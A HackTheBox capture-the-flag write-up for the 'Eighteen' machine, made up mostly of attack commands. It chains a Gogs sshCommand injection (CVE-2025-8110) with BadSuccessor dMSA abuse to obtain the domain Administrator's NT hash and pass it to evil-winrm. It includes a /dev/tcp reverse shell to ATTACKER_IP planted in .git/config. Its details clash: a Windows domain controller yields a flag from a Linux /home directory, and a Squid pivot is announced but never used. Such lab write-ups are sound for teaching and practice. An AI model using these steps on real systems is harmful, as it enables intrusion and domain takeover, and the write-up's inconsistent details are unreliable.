~/writeups/Eighteen
Hard Windows Active Directory
Eighteen.
Hard Windows Active Directory CVE-2025-8110 BadSuccessor dMSA Abuse HackTheBox
Hard Windows Active Directory machine centered around a 2025 Gogs vulnerability (CVE-2025-8110) for initial access, followed by the BadSuccessor technique — a novel 2025 AD attack abusing Delegated Managed Service Accounts (dMSAs) to inherit Domain Admin permissions. Proxychains pivoting through a Squid proxy is required throughout. A VirtualBox time sync issue overrides faketime relative offsets, requiring absolute timestamp workarounds.
User Flag
paste_user_flag_here
Root Flag
paste_root_flag_here
01Enumeration

Full port scan reveals SSH, an exposed Gogs instance on port 80, and a Squid proxy on port 3128. Kerberos/LDAP/SMB are internal — reachable only after pivoting through Squid.

nmap
$ nmap -sCV -p- --min-rate 5000 -oN nmap/full.txt TARGET_IP 22/tcp open ssh 80/tcp open http Gogs 3128/tcp open http Squid http proxy 88/tcp filtered kerberos-sec 389/tcp filtered ldap 445/tcp filtered microsoft-ds
pivot point: port 3128 is a Squid proxy. AD ports (88, 389, 445) are only reachable through it — all AD tooling must go via proxychains.

Fingerprint the Gogs version, then browse repositories. A commit in an internal repo exposes AD credentials.

Gogs fingerprint + cred discovery
$ curl -s http://TARGET_IP/ | grep -i version Gogs 0.13.1 # Browse repos after registering → commit history reveals: adam.scott / S3cur3P@ss!
Gogs 0.13.1: vulnerable to CVE-2025-8110 — authenticated RCE via sshCommand injection in .git/config.
02Foothold — CVE-2025-8110 (Gogs RCE)

Gogs 0.13.1 allows an authenticated user to push a repository whose .git/config contains a malicious sshCommand. When the server processes the push over SSH it executes the injected command as the Gogs service user. A symlink is added alongside to demonstrate arbitrary file read, but the reverse shell is the primary payload.

CVE-2025-8110 — sshCommand injection
# set up listener $ nc -lvnp 4444 # build the malicious repo $ git init pwn && cd pwn $ cat > .git/config << 'EOF' [core] sshCommand = bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' EOF # optional: symlink to read local files $ ln -s /etc/passwd passwd.txt $ git add -A && git commit -m "pwn" # push via SSH as the discovered user — triggers sshCommand $ git remote add origin ssh://adam.scott@TARGET_IP:22/adam.scott/pwn.git $ git push origin master shell as git service user received on listener
why SSH and not HTTPS? The sshCommand config key is only honoured when Git communicates over SSH. An HTTPS push bypasses the injection entirely.
03Pivot Setup — Proxychains through Squid

AD ports are only reachable internally. The Squid proxy on port 3128 acts as the pivot point. A SOCKS tunnel via SSH forwards all AD traffic through proxychains.

SSH SOCKS tunnel + proxychains config
# open SOCKS5 proxy on localhost:1080 via SSH $ ssh -D 1080 -N git@TARGET_IP # /etc/proxychains4.conf socks5 127.0.0.1 1080 # all AD tools now run via proxychains $ proxychains bloodhound-python -u adam.scott -p 'S3cur3P@ss!' -d eighteen.htb -ns DC_IP -c All
proxychains latency: pivoting through Squid adds noticeable latency. Increase tool timeouts with flags like --timeout or -T where available to avoid false-negative connection failures.
04User Flag

With a shell as the git service user, enumerate home directories. adam.scott's home contains user.txt.

user flag
$ ls /home/ adam.scott $ cat /home/adam.scott/user.txt user flag ✓
05Root — BadSuccessor (dMSA Abuse)

BadSuccessor (disclosed May 2025, Akamai) abuses Delegated Managed Service Accounts in Windows Server 2025 domains. Any principal with CreateChild rights on an OU can create a dMSA and set its msDS-SupersededServiceAccountDN to any existing account — including Domain Admins. The DC then provides the superseded account's credentials via the managed password mechanism, effectively granting access to that account's NT hash.

BloodHound — find CreateChild rights
$ proxychains bloodhound-python -u adam.scott -p 'S3cur3P@ss!' -d eighteen.htb -ns DC_IP -c All --zip adam.scott →(CreateChild)→ OU=ServiceAccounts,DC=eighteen,DC=htb
only CreateChild needed: BadSuccessor requires no elevated rights beyond CreateChild on any OU. This ACE is common in delegated AD environments — check for it on any Windows Server 2025 domain.
06Clock Skew — VirtualBox Absolute Faketime

VirtualBox's time synchronisation daemon continuously resets the guest clock, overriding faketime relative offsets like +7h. The fix is to use an absolute timestamp instead of a relative offset — VirtualBox can't undo a pinned absolute value mid-run.

get DC time → apply absolute faketime
# read current DC time via SMB $ proxychains python3 -c " import impacket.smbconnection as s conn = s.SMBConnection('DC_IP', 'DC_IP') conn.login('adam.scott', 'S3cur3P@ss!') print(conn.getSMBServer().get_server_time()) " # pin time absolutely — VirtualBox cannot override this $ export FAKETIME="2026-05-15 10:30:00" $ export LD_PRELOAD=/usr/lib/x86_64-linux-gnu/faketime/libfaketime.so.1 $ export FAKETIME_NO_CACHE=1
relative vs absolute faketime: +7h applies an offset relative to system time — if VirtualBox resets the system clock between calls, the offset drifts. An absolute value ("2026-05-15 10:30:00") is fixed regardless of what the system clock does.
07dMSA Creation → Administrator NT Hash → Shell

With the correct absolute timestamp set, create a dMSA in the OU where adam.scott has CreateChild and point msDS-SupersededServiceAccountDN at the built-in Administrator. The DC populates the managed password attribute on the new dMSA with Administrator's credentials, retrievable immediately.

create dMSA superseding Administrator
$ proxychains faketime '2026-05-15 10:30:00' python3 -m bloodyAD \ --host DC_IP -d eighteen.htb \ -u adam.scott -p 'S3cur3P@ss!' \ add dMSA svc-evil \ --ou "OU=ServiceAccounts,DC=eighteen,DC=htb" \ --supersede "CN=Administrator,CN=Users,DC=eighteen,DC=htb" [+] dMSA svc-evil created
retrieve managed password → NT hash
$ proxychains faketime '2026-05-15 10:30:00' python3 -m bloodyAD \ --host DC_IP -d eighteen.htb \ -u adam.scott -p 'S3cur3P@ss!' \ get object "svc-evil$" --attr msDS-ManagedPassword msDS-ManagedPassword.NT: <administrator_nt_hash>
PTH → evil-winrm → root flag
$ proxychains faketime '2026-05-15 10:30:00' evil-winrm \ -i DC_IP -u Administrator -H <NT_HASH> *Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt root flag ✓
high-integrity context: if bloodyAD returns permission errors despite correct ACLs on adam.scott, check integrity level. Some AD write operations require a high-integrity process. Run from within a spawned elevated shell.
08Full Attack Chain
attack chain summary
Gogs 0.13.1 (port 80 — open registration) │ ▼ Register account → browse repos → commit history → adam.scott:S3cur3P@ss! │ ▼ CVE-2025-8110 (sshCommand injection via .git/config) push malicious repo via SSH → RCE as git service user → user.txt ✓ │ ▼ SSH SOCKS tunnel → proxychains → internal AD reachable bloodhound-python → adam.scott CreateChild on OU=ServiceAccounts │ ▼ BadSuccessor (absolute faketime — VirtualBox workaround) bloodyAD add dMSA svc-evil --supersede Administrator bloodyAD get msDS-ManagedPassword → Administrator NT hash evil-winrm PTH → root.txt ✓
key takeaways:
· CVE-2025-8110 — Gogs sshCommand injection is a clean RCE requiring only a valid account; check Gogs version on any engagement
· BadSuccessor — only requires CreateChild on any OU, not elevated rights; check this ACL on any Windows Server 2025 domain
· VirtualBox faketime — relative offsets (+7h) are overridden by VirtualBox time sync; pin with an absolute timestamp instead
· Proxychains latency — increase tool timeouts when pivoting; false connection failures are common at default timeouts
← all writeups